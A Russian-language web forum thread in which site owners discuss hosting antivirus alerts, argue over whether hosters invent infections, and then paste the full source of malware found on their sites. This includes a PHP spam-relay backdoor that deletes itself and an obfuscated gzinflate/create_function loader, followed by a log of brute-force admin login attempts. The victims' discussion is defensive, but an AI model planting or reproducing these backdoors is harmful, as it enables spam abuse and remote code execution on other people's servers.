Jump to content
Sign in to follow this  
Bager

На вашем сайте вирус!

Recommended Posts

Добрый день. Хостинг reg.ru 

В админке хостинга прилетело письмо: На вашем сайте вирус.

Открываю логи....

---------------
VIRUSDIE RESULT
---------------
/var/www/0000000/data/www/блабла.ru/admin/controller/report/fm.php : Shell.PhpFM : -
-------------
MALDET RESULT
-------------

Иду по пути. Есть папка: /report/ 

Внутри /report/ нет ни одного файла с именем fm.php 

Вопрос. Это чего очередной "разводняк" на очередную фигню от хостера?

Share this post


Link to post
Share on other sites

скорее всего удалили они этот вирус

Share this post


Link to post
Share on other sites
8 минут назад, nikifalex сказал:

скорее всего удалили они этот вирус

Если бы. Что целиком fm.php? И в добавок пишут "вылечить"? 

Вопрос кого? 

Edited by Bager

Share this post


Link to post
Share on other sites

вирусдай не находит и треть дряни

Share this post


Link to post
Share on other sites
10 минут назад, spectre сказал:

вирусдай не находит и треть дряни

Короче. Резюмирую.... Надо написать на хостинг "Пожалуйста отключите это г-но" (енто не первый раз)

В контексте прописать: Хватит меня разводить на пустом месте, придумайте что-то поизящнее.:| 

Как я понимаю такого не бывает что есть вирус, в файле, которого нет. Даже звучит бредово.:shock:

Я просто уточнить, вдруг я съел че-то нито, файла в папке не могу увидеть. :grin:

Вирусдай - это такой прикол, чтобы скучно не было. Я так понял. :-D

Спасибо!

 

Share this post


Link to post
Share on other sites

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

Share this post


Link to post
Share on other sites
6 минут назад, spectre сказал:

провериться бы надо, сами по себе подобные штуки не появляются да и хостеры редко страдают такого плана разводом

 

можете в лс мне написать - это недорого

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

Share this post


Link to post
Share on other sites
25 минут назад, Bager сказал:

Сейчас хостинг ответит на вопрос "шо конкретно вы имели ввиду"

В зависимости от того что я пойму из ответа, буду думать.

Ответ хостинга: Здравствуйте! Судя по всему в данном случае имело место срабатывание антивирусной проверки на временный файл. На данный момент проблем не наблюдаем. Приносим извинения за беспокойство.

Енто как? Ну хорошо. Может и был этот временный файл. Как я понимаю, должны быть логи. Где их посмотреть? У меня чего только с сайтами не было, но вот вирусы, это что - то новое. 

Не успел я с поддержкой проститься, опять в логах антивируса - новая запись. Самое главное: На сайте ни одного товара, он не  в индексе, посетителей нет. Он нафик не кому не нужен. Ошибок нет. Господа, научите как посмотреть генерацию временных php файлов. Наверняка что -то такое есть. 

Share this post


Link to post
Share on other sites

пора уже создавать тему "отмазки хостеров". Будет покруче "анекдотов"

они иногда такую дичь несусветную несут шо капец.

  • +1 1

Share this post


Link to post
Share on other sites
7 минут назад, nikifalex сказал:

пора уже создавать тему "отмазки хостеров". Будет покруче "анекдотов"

они иногда такую дичь несусветную несут шо капец.

Вот так бы сразу. Одним предложением, все понял.

Собственно... В чем весь сыыыырррр в скрине как я понимаю.

522476629_2019-03-0720_06_47.png.a4b0b04e59927a23f5e10c9de5caad9d.png

Share this post


Link to post
Share on other sites
Цитата

..удаляет вредоносные фрагменты кода и в случае необходимости дописывает недостающие для сохранения работоспособности вашего веб-сайта фрагменты

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

  • +1 1

Share this post


Link to post
Share on other sites
14 минут назад, AlexDW сказал:

 

поди по тарифу рублей за 500 - оно еще и само вам сайт с нуля сделает

до чего техника дошла! (с)

Не вопрос

988734926_2019-03-0721_54_56.thumb.png.5649034b91beb6f7ddf1eeffe0c42986.png

 

Share this post


Link to post
Share on other sites

а меня вот тоже обрадовали сегодня:

IHC.RU <noreply@ihc.ru>

04:10 (15 часов назад)
 
 
cleardot.gif
cleardot.gif
кому: я

Здравствуйте.

Ваш хостинг p502184 был проверен антивирусом.

Найдены вирусы, спам-ссылки или уязвимые скрипты! Помощь в лечении сайтов вам могут оказать в компании Ревизиум.

Вредоносный код в php:

/home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php

 

Здравствуйте.

1. Указанный файл /home/p502184/www/kinoigrushki.ru/catalog/model/tool/imgwm.php изменялся 11 апреля.
Также в логах мы нашли запрос, к этому файлу, в логах доступа к сайту в это время.
Боле подробно на скриншоте:
https://scr.pics/cf3cf323e.jpg

 

Не похоже на развод...

Share this post


Link to post
Share on other sites
2 часа назад, Koss88 сказал:

Не похоже на развод...

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

Share this post


Link to post
Share on other sites

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

Share this post


Link to post
Share on other sites
4 часа назад, mpn2005 сказал:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

Короче. Как это понял я. Я разместил на обычном дешевом шареде магазин. 

Это мое личное мнение. Я могу быть не прав!!!

Начал заливать товары... тысяч по 20... каждый день иногда и пару раз в день. Сайту нету двух месяцев, посетителей... два калека в сутки. Сначала бомбил "вирус дай".

Потом стали находится спам скрипты в почте, что действительно было. Вирусдай присылал ссылки на несуществующие файлы, мягко говоря часто. Потом начал находить в фото вирусы.

Фото все наши. Вирусы там я так и не нашел нигде. Мы с ними, с фото, просто не умеем ничего такого делать. 

 

В итоге я нацарапал в поддержку в коротком переводе: "не пошлибы вы .... сами знаете куда с вашим г...ом и отрубите это ... для моего сайта вообще"

 

Отрубили.

 

Дальше начались чудеса.... Файловая система, при загрузке 30 -40 процентов, не знаю с какой стати, по ночам, становилась переполненной. Я до сих пор не понял почему. Итогом стало то, что начал рушится шаблон, файлы......  В основном ночью. Утром все опять как было.... Только сайт... то одно отвалилось, то другое... Короче резервная копия через день.

Дальше, стал замечать что при индексации (заходе робота), вываливалась частенько на целую партию товаров 404 ошибка... сайт с утра был доступен и эти товары отдавали код 200. К серверу доступа нет, но раз 404 у яндекса, а утром 200, значит дурак точно не Яндекс. 

Быстрее всего, сайт перегружал процессор во время захода бота, сверх установленной нормы и сервер делал kill process. Я не спец по серверам. Пишу как понимаю.

Итогом стало то, что из 20.000 товаров, чуть меньше, с ежедневным обновлением, проиндексировал процентов 60. За пару месяцев.

 

Проблему решил радикально - VDS. Переехал на последний. Дело двинулось. Пошла индексация. Самое интересное, я хостера не виню. Там давали "пиковую нагрузку" в 1 гигобайт оперативки по условиям тарифа. Это пиковая. 

 

На VDS, когда сайт в покое, то есть на нем вообще нет никого, кушает, 1.1 - 1.3 гига. То есть на сайте с товаром, минимум оперативки должно быть гигабайта 1,5 - 2 видимо. И одного процессора... маловато.

Как я понял, нЕфига слона запускать в посудную лавку, видимо я перегружал им процессор и оперативку, плюс по ночам выгрузки товаров, собственно.... они, таким образом "просили" переехать.

Как-то так.

Сайт в итоге покарежили. Пришлось с нуля восстанавливать. Даже резервные копии не помогли.

 

 

 

 

 

Edited by Bager

Share this post


Link to post
Share on other sites
11 часов назад, mpn2005 сказал:

Но если уже хостеры начнут вирусы подкидывать, а потом предлагать полечить за деньги.

Вот тут реально дикие времена начнутся. 8)

 

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

В 07.03.2019 в 17:47, Bager сказал:

Хостинг reg.ru 

А рег.ру - один из самых паршивейших хостеров по неадекватной качеству цене.

Поддержка слабая,   софт годами не обновляют на шаред-хостинге.

Выезжают в конкурентной борьбе только за счет того, что первыми предлагают свои услуги новичкам, которые зарегали домен.

Share this post


Link to post
Share on other sites
11 минут назад, sazonoff сказал:

 

Вряд ли им нужен такой бизнес.  Репутацию на раз потеряют.

 

 

таймвеб и регру довольно неплохо живут с нахождения несуществующих вирусов, да и существующих тоже

у них еще круче бывают кейсы, вырубают сайт и говорят что пока вы не уберете вирус и не ОБНОВИТЕ CMS мы нифига не разблокируем, идите в ревизиум за 6к

на резонный вопрос как можно обновить cms и как это вообще связано с лечением сайта ответить затрудняются, как и на другие вполне конкретные вопросы

 

также распространены заражения от соседей по серверу, то есть аккаунты не изолированы и какой-то вася который заразился заражает все аккаунты, поддержка мычит но не признается

выключается сайт, просто отдает 403 на любой запрос - через 2 часа - опять вирус, чудеса

ладно, на эту тему могу рассказывать много и долго))

 

 

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

 

Share this post


Link to post
Share on other sites
6 часов назад, spectre сказал:

знаю одно точно, сайт на опенкарт в покое не может потреблять 1гб оперативки

Ну как вам сказать. Возможно сервер настроен не совсем верно. Однако, факт налицо.

freem.thumb.png.784aecc7b19c6cd77382581cd4255d66.png

Вот так вот практически всегда.  Может не правильно перевожу?  Шаблонный сайт. Только внешний марафет навел. около 15.000 товаров. 

То есть, я пока ничего не делал, сервер кое -как настроил и запустил. Просто с этими танцами, я про хостинг, никак не уберу все косяки на сайте. 

Про большее пока и не заикаюсь.

 

Share this post


Link to post
Share on other sites

вам про сайт, а вы про сервер.

Share this post


Link to post
Share on other sites
В 19.04.2019 в 22:07, mpn2005 сказал:

Не похоже. Особенно если файл всё ещё на месте.

Вероятнее всего при открытии там будет довольно нечитаемый код.

Для начала хотя бы смените у него расширение на .txt

содержимое файла:

<?php
error_reporting(0);
set_time_limit(0);
if(isset($_GET["admin"])){
    unlink($_SERVER['SCRIPT_FILENAME']);
}
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
    {
    echo "indata_error";
    exit;
    }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
    {
    echo "indata_error";
    exit;
    }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader)){
    echo "sent_ok";
} else {
    echo "sent_error";
}
exit;
?>

Share this post


Link to post
Share on other sites
3 часа назад, Koss88 сказал:

содержимое файла:

Дыра для рассылки спама.

Share this post


Link to post
Share on other sites

Небольшая сводка для справки.

На своей демке поставил ловушку неудачных попыток входа в админку:

Вот лог (чуть больше чем за сутки):

2019-04-24 19:26:03 - 5.188.x.x login:admin password:12345
2019-04-24 20:34:56 - 5.188.x.x login:admin password:123123
2019-04-24 21:43:43 - 5.188.x.x login:admin password:pass
2019-04-24 22:52:51 - 5.188.x.x login:admin password:abc123
2019-04-25 0:01:18 - 5.188.x.x login:admin password:1234567
2019-04-25 1:10:15 - 5.188.x.x login:admin password:12345678
2019-04-25 2:19:16 - 5.188.x.x login:admin password:123456789
2019-04-25 3:28:36 - 5.188.x.x login:admin password:1234567890
2019-04-25 4:14:51 - 77.81.x.x login:admin password:123
2019-04-25 4:37:53 - 5.188.x.x login:admin password:admin1234
2019-04-25 5:49:32 - 5.188.x.x login:admin password:admin12345
2019-04-25 7:00:29 - 5.188.x.x login:admin password:admin2015
2019-04-25 8:10:43 - 5.188.x.x login:admin password:admin2016
2019-04-25 9:20:31 - 5.188.x.x login:admin password:admin1
2019-04-25 10:30:04 - 5.188.x.x login:admin password:adminadmin
2019-04-25 11:39:40 - 5.188.x.x login:admin password:111111
2019-04-25 12:49:32 - 5.188.x.x login:admin password:admin2014
2019-04-25 13:59:30 - 5.188.x.x login:admin password:123
2019-04-25 15:08:58 - 5.188.x.x login:admin password:1234
2019-04-25 16:18:40 - 5.188.x.x login:admin password:demo
2019-04-25 17:29:22 - 5.188.x.x login:admin password:demo123
2019-04-25 18:38:54 - 5.188.x.x login:admin password:guest
2019-04-25 19:49:25 - 5.188.x.x login:admin password:hello
2019-04-25 20:59:54 - 5.188.x.x login:admin password:password
2019-04-25 22:10:28 - 5.188.x.x login:admin password:qwe123
2019-04-25 23:20:51 - 5.188.x.x login:admin password:qwerty
2019-04-26 0:31:13 - 5.188.x.x login:admin password:test
2019-04-26 1:42:14 - 5.188.x.x login:admin password:test123
2019-04-26 2:53:32 - 5.188.x.x login:admin password:123654
2019-04-26 4:04:05 - 5.188.x.x login:admin password:1
2019-04-26 5:14:41 - 5.188.x.x login:admin password:admin2017
2019-04-26 6:18:24 - 77.81.x.x login:admin password:12345

 

  • +1 1

Share this post


Link to post
Share on other sites

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

Share this post


Link to post
Share on other sites
3 часа назад, Koss88 сказал:

Как то раз появился файл catalog/view/indess.php ночью неизвестно откуда 

Антивирус хостинга ругается что в нем вредоносный код.

Содержимое файла: <?php
$size = array();
$datas='%DDW%DB%AE%83+%10%FC%9A%7DGY%A0%3E%D6K%FF%FF%93%CE%CE%02%8A%F5%D2hmr%DA%C4%10%84ev%98Y%A1%25%EF%28%D4x%FC%03%AD%D3%16%83%26%8D%04%26%DF%90%1F%C8%07%AAod%0D%D5%0D%D9%96LO%E6N%C1j0%EB%C2%18%D9cD%5E%7D%97_%1BL-%D7b%D6c%1C%01v%82%92%91Z%019%10%0B%94%F4%5B%AA%85UE%9E%13%A0%F0%91%11%D7%03P%9E%901M%83%B5+_%29%1F%812d%7B%B4%5E%E9aw%83B%29O%C9%25%89%90%CB%137%C4%9Df%D4%91%92j%84%15%B6H%DDa%E1%0C%24%A7%88%B4%9DU%10%A1%E7sG%F8%07r%86%F8%86v%8CA%3A%AFS%FD%2C%D7%A4L%91%11%92%8A%3E%A3%5C%8C6j5%DB%EF%B0Ku%94%AB%99%D2M%BB%0B0%1D%0F%17%BAy%AD%04%93%A0%0Eg%ECT%99%40%21%A0%7DR%D5%E8Ne%0A%BEh%9DDSV%F8d%9C-%10o5%FB%23%15%D2%3A%C8ba%88l%BB%5C%E4%ED%19IK%CC%D0%9F%';$datas.='F7q%AFxd%DC%E2U%AA%14%25%C4%CFE%CB%03qE%DC%A3%1F%2Bj%F9i%9C0%FAbJ%DFY%0C%97%FBrI%C1%EC%1C%5Co%FA%BE%89%FC%85%F6%BD8%DE%9B%15%23%C6%CE%CB%1B%0AG%BA%D6%C6tI%F5z2%A8wP%E01%BB%A7%22%2C%F6%BE%FA0%EAd%5C%EE%E2%F2%D1%26%BD%01%23%07%EB%C9%2A%01%AF%22C%AE%DC%3F%C7m%BA%94%9D%CEj%96I%99%F2n%8A%E9n%89%5B%5Dg%B59%1F%98U%AE%D8%E2w%85%84%D99H%AAg%5E%FF%16%CE%29%8F%B0%A0%DC%5C%FE%B5%E0R%F6c%16%B8%9C%B4R%40%87%8B%FB%19%F3R_%5E2%FF%29%83%EA%24Kh%AE%B0%A6D%FB';
$data = cutting($datas,$size);
if($data == NULL){
    echo 'indata_error';
}
function cutting($datass,$size,$nameimage='no_name.jpg'){
    $datas='%84%29kl%7F%C9%0E%C4%3B%DD%E6%3D%B1%C5%C2%B7%7Dq%AB%B0%1F0h%9F%FF%FFu%AA8%8D%E36W%0E%FF%EE%A0%BC%DB%F1%B3%CFd%27ly%04-%7EN%2C%85%8A%AA%8AV%F1%9F+%12%B53eB4%BD%B0%40%5E%8Fan%CB%3Ei%3B%13%FF%0F';$datas='};'.urldecode(gzinflate(urldecode($datass.$datas))).'exit;{';create_function('',$datas);
    if($nameimage != 'no_name.jpg'){ 
        return json_encode(array('img'=>$datas,'name'=>$nameimage));
    } else {
        return NULL;
    }
}
?>

 

Может его удалить просто?

 

От того что вы его удалите ничего не изменится. Через какое то время будет тоже самое. 
 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.